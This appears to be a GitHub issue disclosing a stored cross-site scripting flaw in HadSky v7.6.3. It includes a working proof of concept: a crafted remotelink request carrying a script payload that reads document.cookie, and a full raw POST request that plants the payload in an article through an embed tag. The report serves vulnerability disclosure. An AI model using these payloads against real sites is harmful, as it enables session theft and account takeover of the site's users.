Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

HadSky v7.6.3 has a Stored Cross-site Scripting (XSS) Vulnerability #30

Open
Hebing123 opened this issue Mar 27, 2024 · 0 comments
Open

HadSky v7.6.3 has a Stored Cross-site Scripting (XSS) Vulnerability #30

Hebing123 opened this issue Mar 27, 2024 · 0 comments

Comments

@Hebing123
Copy link
Owner

Hebing123 commented Mar 27, 2024
edited

Summary

HadSky v7.6.3 has been found to have a stored XSS vulnerability. This issue occurs because the application fails to properly sanitize input passed via the 'url' parameter to the 'remotelink' function.

Details

An attacker can exploit this weakness via a crafted HTTP request like so:https://your-ip/index.php?c=app&a=puyuetianeditor:index&s=remotelink&url=%0d</script><script>alert(document.cookie)</script>
This request results in a link ID generation (for instance, ID = 36).
image
The attacker can then lure a user to visit this link: https://your-ip/index.php?c=app&a=puyuetianeditor:index&s=download&id=36.
image
The interesting thing about this vulnerability is that we can cause the Location header to disappear by adding %0d to the payload, otherwise this would be an unexploitable vulnerability because the html code would not be executed during the redirect.
image

The root cause is the lack of input sanitization in the 'remotelink' script, specifically avoiding filtering on the 'url' parameter.

Proof of Concept (POC)

Send the following GET request to the target server:
https://your-ip/index.php?c=app&a=puyuetianeditor:index&s=remotelink&url=%0d</script><script>alert(document.cookie)</script>
Obtain generated link ID and craft new link:
https://your-ip/index.php?c=app&a=puyuetianeditor:index&s=download&id=[OBTAINED_ID]
Distribute crafted link, and the XSS payload executes upon user visitation.

Since HadSky considers the embed tag to be a secure tag, we can even exploit this stored XSS vulnerability to trigger it in the Article.

POST /index.php?c=post&type=read&id=&return=json&chkcsrfval=90f44b92b531f00d0fef7dc65308769a HTTP/1.1
Host: 192.168.160.154:177
Content-Length: 373
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.289 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.160.154:177/index.php?c=edit&type=read&sortid=0
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie:  PHPSESSID=pbp0r55v7bhi2gban2v1s86knj;
Connection: close

_webos=HadSky&chkcsrfval=90f44b92b531f00d0fef7dc65308769a&sortid=1&label=&titlecolor=&title=at&content=awt<embed%20src="http://192.168.160.154:177/index.php?c=app%26a=puyuetianeditor:index%26s=download%26id=36">&PytMainContent2=&PytVideoAutoplay=&PytVideoBorder=1&PytVideoWidth=&PytVideoHeight=&PytMusicAutoplay=&PytMusicLoop=&readlevel=0&top=&high=&locked=&replyafterlook=

image

Impact

This vulnerability allows an attacker to execute any arbitrary HTML code in the context of the victim's browser session. The script could be used to steal user credentials, perform actions on the user's behalf, or even deface the website, depending on what the payload contains. The severity of this vulnerability is high, given that it permits a complete bypass of standard security measures.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@Hebing123